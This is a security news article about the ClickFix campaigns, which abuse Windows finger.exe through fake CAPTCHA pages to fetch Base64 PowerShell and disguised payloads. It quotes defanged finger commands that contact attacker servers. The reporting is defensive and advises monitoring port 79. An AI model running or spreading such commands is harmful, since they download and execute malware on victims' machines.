A new social engineering campaign, identified by cybersecurity researchers as “ClickFix,” is ingeniously exploiting a decade-old Windows command-line tool, finger.exe, to trick unsuspecting users into downloading and executing malicious code. This sophisticated attack, observed since at least November 2025, leverages deceptive CAPTCHA verification pages to lure victims into initiating the malware infection sequence. The use of the legacy finger protocol is a key characteristic that allows threat actors to potentially bypass security measures not configured to monitor traffic on TCP port 79.
Internet Storm Center (ISC) analysts have been actively tracking this threat, noting two primary campaigns, KongTuke and SmartApeSG, that are utilizing this method. Both campaigns share a common initial tactic: presenting users with convincing fake CAPTCHA pages. This approach preys on the common user experience of needing to verify human interaction online, making the initial deception highly effective. The continued relevance of this attack highlights a persistent vulnerability in environments where older network protocols are not adequately secured or monitored.
The ClickFix Attack Mechanism and Its Exploitation of finger.exe
The core of the ClickFix attack lies in its innovative use of the finger.exe tool, a utility designed to retrieve user information from a remote system. Threat actors are abusing this seemingly innocuous program to fetch malicious payloads from their command-and-control (C2) servers. When a user interacts with a deceptive CAPTCHA page and clicks to proceed, they inadvertently execute a script that triggers the finger.exe command.
For instance, the KongTuke campaign employs a command structured like “finger gcaptcha@captchaver[.]top.” Upon receiving this request, the attacker-controlled server responds not with user information, but with a PowerShell command. This command is typically encoded in Base64, making it harder to detect at first glance. Once decoded and executed on the victim’s machine, this PowerShell script initiates the subsequent stages of the malware’s deployment.
A similar pattern is observed in the SmartApeSG campaign. This variant uses a command such as “finger [email protected][.]108” to prompt the C2 server. The server’s response in this case delivers a script that proceeds to download and execute a malicious file. Researchers have seen instances where this script retrieves a file disguised as “yhb.jpg,” which actually contains the core malicious payload. This multi-stage approach allows the attackers to create layers of obfuscation, increasing the chances of the malware establishing a persistent presence on the compromised system without immediate detection.
The effectiveness of this attack vector is amplified by the fact that many network security solutions are optimized to monitor more modern protocols, potentially overlooking traffic on the legacy TCP port 79 used by the finger protocol. While explicit proxies in corporate networks might block this port, individual systems or less rigorously secured networks remain vulnerable. This continued reliance on legacy tools for novel cyberattacks underscores the importance of a comprehensive security posture that includes monitoring and securing all network traffic, regardless of its perceived obsolescence.
Implications and Future Concerns for Cybersecurity
The ClickFix campaign serves as a stark reminder that threat actors are constantly innovating, finding new ways to leverage existing tools and protocols to circumvent security defenses. The reliance on the finger.exe protocol, a tool largely forgotten by many IT professionals, highlights a critical gap in security awareness and proactive defense strategies. Cybersecurity professionals must remain vigilant against emerging social engineering tactics that exploit outdated technologies.
The ongoing nature of the KongTuke and SmartApeSG campaigns suggests that this attack method is proving to be successful and may continue to be refined and deployed. Organizations should review their network security configurations to ensure that traffic on legacy ports, especially TCP port 79, is adequately monitored and, if not essential, blocked. Furthermore, user education on identifying and avoiding deceptive online practices, such as fake CAPTCHA pages, remains a crucial element in preventing initial infection vectors.
The continued evolution of such threats means that security teams will need to adapt their detection and response mechanisms. This may involve employing more advanced threat hunting techniques and regularly auditing network protocols in use. The focus will likely remain on how organizations can balance the need for operational efficiency with robust cybersecurity measures to mitigate risks posed by both modern and legacy attack vectors. The ongoing analysis of these campaigns by the Internet Storm Center will likely provide further insights into the evolving tactics, techniques, and procedures of these threat actors.